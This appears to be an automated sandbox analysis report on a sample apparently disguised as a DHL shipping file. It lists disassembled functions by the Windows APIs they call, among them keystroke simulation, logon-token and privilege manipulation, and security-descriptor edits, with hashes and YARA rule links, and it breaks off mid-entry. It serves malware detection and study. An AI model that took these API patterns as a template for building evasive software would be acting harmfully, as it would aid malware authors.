WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00AAEE51,00B23630,00000002), ref: 00ACCD26

Part of subcall function 00ACCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00ACCD19,?,?,?), ref: 00ACCC59
Part of subcall function 00ACCC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00ACCD19,?,?,?,?,00AAEE51,00B23630,00000002), ref: 00ACCC6E
Part of subcall function 00ACCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00ACCD19,?,?,?,?,00AAEE51,00B23630,00000002), ref: 00ACCC7A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 76f1455f8b2ff0edf9ded9322607d305e30adbbec0181d95c8a43c5af009b85d
Instruction ID: 9787caee3d3ac5f631dbec886d04ce48e32d82beb6efa99933e68e62f8f2ce47
Opcode Fuzzy Hash: 76f1455f8b2ff0edf9ded9322607d305e30adbbec0181d95c8a43c5af009b85d
Instruction Fuzzy Hash: 63E03076400604EFC7219F8AD900CAABBF8FF84260710852FE95682110D371AA14DB60

Function 00A62DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A62DC4

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: d1f7c19cd88cf9a73f731ca28da454a79847dab904de9a803d22e4ac8832cb34
Instruction ID: 0da6483f700aed7279d82d3d203b83163c7d1cf8388d017854393c2e188e990a
Opcode Fuzzy Hash: d1f7c19cd88cf9a73f731ca28da454a79847dab904de9a803d22e4ac8832cb34
Instruction Fuzzy Hash: 22E0CD766001246BC710E6989D05FEA77EDDFC87A0F044075FD09D7248DA60AD80C550

Function 00A62B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A63837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A63908

Part of subcall function 00A6D730: GetInputState.USER32 ref: 00A6D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00A62B6B

Part of subcall function 00A630F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A6314E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 23d6fb7a9c0fb67bb447e9b600e61a3e1725d9e84166a5aa03d2487e3b6aaf90
Instruction ID: ea6e8a2ccaa7b099e2b70dc7e91244244a733df0724fbb049cd9ee71ab575f00
Opcode Fuzzy Hash: 23d6fb7a9c0fb67bb447e9b600e61a3e1725d9e84166a5aa03d2487e3b6aaf90
Instruction Fuzzy Hash: E1E0862370424446CA08BBB5AA525BDF77DDBD1351F40197EF542472A2CE24454A8752

Function 00AA039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00AA0704,?,?,00000000,?,00AA0704,00000000,0000000C), ref: 00AA03B7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e2510d6aad34120af45f6ffd873e26614fbe0ec0ae5cd19f764c32793acaa9b0
Instruction ID: 8970399b88a83cd1dfbfed21cd7d900b9f75f57846c2e469ae6846090164f749
Opcode Fuzzy Hash: e2510d6aad34120af45f6ffd873e26614fbe0ec0ae5cd19f764c32793acaa9b0
Instruction Fuzzy Hash: 57D06C3204010DBBDF028F85DD06EDA3BAAFB48714F014100BE1856020C732E832EB94

Function 00A61CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00A61CBC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: b3e4529c24abfa4e1f279954add9d9da9af00378cb56d8658f343b1b33df9be7
Instruction ID: ce4841248f3b7b0d8ced3a5fd94177afc0ff67ec4bd86f9af130b36dcda57d73
Opcode Fuzzy Hash: b3e4529c24abfa4e1f279954add9d9da9af00378cb56d8658f343b1b33df9be7
Instruction Fuzzy Hash: ECC092362C0308AFF3148BC4BD4BF287768A358B11F248401F609AB5E3CBA22824EA54

Function 00AD744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00A65745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00A6949C,?,00008000), ref: 00A65773

GetLastError.KERNEL32(00000002,00000000), ref: 00AD76DE

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 47136c6e23c491dee4b9acdd15dafa1e47a92426e96cf3890007e69bca61cbba
Instruction ID: d9a2055aa7c98fde4eb07adde913965b6fb82bf2624669d66624fff0fb124cbf
Opcode Fuzzy Hash: 47136c6e23c491dee4b9acdd15dafa1e47a92426e96cf3890007e69bca61cbba
Instruction Fuzzy Hash: E6818E306087019FC719EF28C591AADB7F1AF89714F04455EF89A5B3A2EB30ED45CB92

Function 00A66246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,00AA24E0), ref: 00A66266

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6ec25303d4b5eb14348bd83b61a256310db51c2c781bf82c1fd46dc830c5bb2c
Instruction ID: 61ea82b5478043824292961a7b4ffaf9954b2df5106e2f7517098fe1b2e9fbf1
Opcode Fuzzy Hash: 6ec25303d4b5eb14348bd83b61a256310db51c2c781bf82c1fd46dc830c5bb2c
Instruction Fuzzy Hash: 58E0B675800B01CFC3318F2AE814552FBF5FFE13613214A2ED1E592660D3B05886DF90

Function 0168E968 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0168E979

Memory Dump Source

Source File: 00000000.00000002.1422791502.000000000168C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0168C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168c000_DHL 745-12302024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 915ea89fcef8fe8a6515ffdcfea6ae2daf82e3139af7b7a8fce8ff0db498b6a8
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: BBE0E67494020DDFDB00EFB4D9496AD7FB4EF04301F100261FD05D2280D6719D508A62

Non-executed Functions

Function 00AF9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AF961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AF965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AF969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AF96C9
SendMessageW.USER32 ref: 00AF96F2
GetKeyState.USER32(00000011), ref: 00AF978B
GetKeyState.USER32(00000009), ref: 00AF9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AF97AE
GetKeyState.USER32(00000010), ref: 00AF97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AF97E9
SendMessageW.USER32 ref: 00AF9810
SendMessageW.USER32(?,00001030,?,00AF7E95), ref: 00AF9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AF992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AF9941
SetCapture.USER32(?), ref: 00AF994A
ClientToScreen.USER32(?,?), ref: 00AF99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AF99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AF99D6
ReleaseCapture.USER32 ref: 00AF99E1
GetCursorPos.USER32(?), ref: 00AF9A19
ScreenToClient.USER32(?,?), ref: 00AF9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00AF9A80
SendMessageW.USER32 ref: 00AF9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00AF9AEB
SendMessageW.USER32 ref: 00AF9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AF9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AF9B4A
GetCursorPos.USER32(?), ref: 00AF9B68
ScreenToClient.USER32(?,?), ref: 00AF9B75
GetParent.USER32(?), ref: 00AF9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00AF9BFA
SendMessageW.USER32 ref: 00AF9C2B
ClientToScreen.USER32(?,?), ref: 00AF9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AF9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00AF9CDE
SendMessageW.USER32 ref: 00AF9D01
ClientToScreen.USER32(?,?), ref: 00AF9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AF9D82

Part of subcall function 00A79944: GetWindowLongW.USER32(?,000000EB), ref: 00A79952

GetWindowLongW.USER32(?,000000F0), ref: 00AF9E05

Strings

@U=u, xrefs: 00AF965B, 00AF96C9, 00AF96F2, 00AF97AE, 00AF97E9, 00AF9810, 00AF9918, 00AF9A80, 00AF9AAE, 00AF9AEB, 00AF9B1A, 00AF9BFA, 00AF9C2B, 00AF9CDE, 00AF9D01
F, xrefs: 00AF9D07
@GUI_DRAGID, xrefs: 00AF997D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$@U=u$F
API String ID: 3429851547-1007936534
Opcode ID: a1c5ea0579052c0987278ca2403c4eb36852288a871831c0a8368e45bdcc9271
Instruction ID: a3443fe4d4dcd9717c69bd5feecd39608714b22d67c73c2fed432a2548aafa21
Opcode Fuzzy Hash: a1c5ea0579052c0987278ca2403c4eb36852288a871831c0a8368e45bdcc9271
Instruction Fuzzy Hash: 71427B34208209AFD724DFA8CD44BBBBBE9FF48720F144A19F699C72A1D731A855CB51

Function 00AF4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00AF48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00AF4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00AF4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00AF494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00AF495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00AF497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00AF49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00AF49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00AF4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00AF4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00AF4A7E
IsMenu.USER32(?), ref: 00AF4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AF4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AF4B20
GetWindowLongW.USER32(?,000000F0), ref: 00AF4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00AF4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00AF4C82
wsprintfW.USER32 ref: 00AF4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AF4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00AF4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AF4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AF4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00AF4D5A

Strings

@U=u, xrefs: 00AF48F3, 00AF4908, 00AF495C, 00AF4A0F, 00AF4A56, 00AF4A7E, 00AF4BE3, 00AF4C82, 00AF4CC9, 00AF4D13, 00AF4D33, 00AF4E15, 00AF4E4E, 00AF4EA5, 00AF4F10
%d/%02d/%02d, xrefs: 00AF4CA8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$@U=u
API String ID: 4054740463-2764005415
Opcode ID: bc093b1f53938d99c7909b1dc16f160226f04a445094e856b51fd2bbce43e050
Instruction ID: 200da1e1fb4a3e0f20b250424447d98d2d35f85e37a1259bf7582cdc8c316a79
Opcode Fuzzy Hash: bc093b1f53938d99c7909b1dc16f160226f04a445094e856b51fd2bbce43e050
Instruction Fuzzy Hash: C712D071600218ABEB248FA9CD49FBF7BF8EF49750F104119F61ADB2A1DB789941CB50

Function 00A7F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00A7F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ABF474
IsIconic.USER32(00000000), ref: 00ABF47D
ShowWindow.USER32(00000000,00000009), ref: 00ABF48A
SetForegroundWindow.USER32(00000000), ref: 00ABF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ABF4AA
GetCurrentThreadId.KERNEL32 ref: 00ABF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ABF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ABF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ABF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00ABF4DE
SetForegroundWindow.USER32(00000000), ref: 00ABF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ABF4F6
keybd_event.USER32(00000012,00000000), ref: 00ABF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ABF50B
keybd_event.USER32(00000012,00000000), ref: 00ABF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ABF519
keybd_event.USER32(00000012,00000000), ref: 00ABF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ABF528
keybd_event.USER32(00000012,00000000), ref: 00ABF52D
SetForegroundWindow.USER32(00000000), ref: 00ABF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00ABF557

Strings

Shell_TrayWnd, xrefs: 00ABF46F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9c1f12f6996d5ddbb1274a8d64dd58684c4b9c4b52445cea6172f64b1227be0a
Instruction ID: 833fc57ae147926d2bbea2fa07a2e04525b543c33e896061f5a7f8394f542d31
Opcode Fuzzy Hash: 9c1f12f6996d5ddbb1274a8d64dd58684c4b9c4b52445cea6172f64b1227be0a
Instruction Fuzzy Hash: 57314171A8021CBFEB20ABF65D4AFBF7E6CEB44B60F140065FA05E61D1C6B15D01EA60

Function 00AC1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00AC16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC170D
Part of subcall function 00AC16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC173A
Part of subcall function 00AC16C3: GetLastError.KERNEL32 ref: 00AC174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00AC1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00AC12A8
CloseHandle.KERNEL32(?), ref: 00AC12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AC12D1
GetProcessWindowStation.USER32 ref: 00AC12EA
SetProcessWindowStation.USER32(00000000), ref: 00AC12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AC1310

Part of subcall function 00AC10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AC11FC), ref: 00AC10D4
Part of subcall function 00AC10BF: CloseHandle.KERNEL32(?,?,00AC11FC), ref: 00AC10E9

Strings

winsta0, xrefs: 00AC12CC
default, xrefs: 00AC130B
, xrefs: 00AC125A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: dda7bfb89bf09aa3bde37b16bb1ebabe399afc8e1c759d44d3b74a4f6e1db248
Instruction ID: cf6c655ef8cedf563fb7f21662b8fd1720df070c324ab6745dc1971948f457bd
Opcode Fuzzy Hash: dda7bfb89bf09aa3bde37b16bb1ebabe399afc8e1c759d44d3b74a4f6e1db248
Instruction Fuzzy Hash: 32819AB1A00209AFDF25DFE4DE49FEE7BB9EF05704F154169F911A61A2DB308945CB20

Function 00AC0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1114
Part of subcall function 00AC10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC1120
Part of subcall function 00AC10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC112F
Part of subcall function 00AC10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC1136
Part of subcall function 00AC10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AC0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AC0C00
GetLengthSid.ADVAPI32(?), ref: 00AC0C17
GetAce.ADVAPI32(?,00000000,?), ref: 00AC0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AC0C6D
GetLengthSid.ADVAPI32(?), ref: 00AC0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AC0C8C
HeapAlloc.KERNEL32(00000000), ref: 00AC0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AC0CB4
CopySid.ADVAPI32(00000000), ref: 00AC0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AC0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AC0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AC0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC0D45
HeapFree.KERNEL32(00000000), ref: 00AC0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC0D55
HeapFree.KERNEL32(00000000), ref: 00AC0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC0D65
HeapFree.KERNEL32(00000000), ref: 00AC0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00AC0D78
HeapFree.KERNEL32(00000000), ref: 00AC0D7F

Part of subcall function 00AC1193: GetProcessHeap.KERNEL32(00000008,00AC0BB1,?,00000000,?,00AC0BB1,?), ref: 00AC11A1
Part of subcall function 00AC1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AC0BB1,?), ref: 00AC11A8
Part of subcall function 00AC1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AC0BB1,?), ref: 00AC11B7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 9032fd0cf0d9aa44e8ed9fdb3eaa323431c2ce139ecae0817636bcd045db0644
Instruction ID: 28b3b71c53d5f33929660862861e235127fa86979e089d9d72424363faaac5d2
Opcode Fuzzy Hash: 9032fd0cf0d9aa44e8ed9fdb3eaa323431c2ce139ecae0817636bcd045db0644
Instruction Fuzzy Hash: E871AAB290021AEBDF11DFE5DD44FAEBBB8BF04710F054219E905E7191DB70AA06CBA0

Function 00ADEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

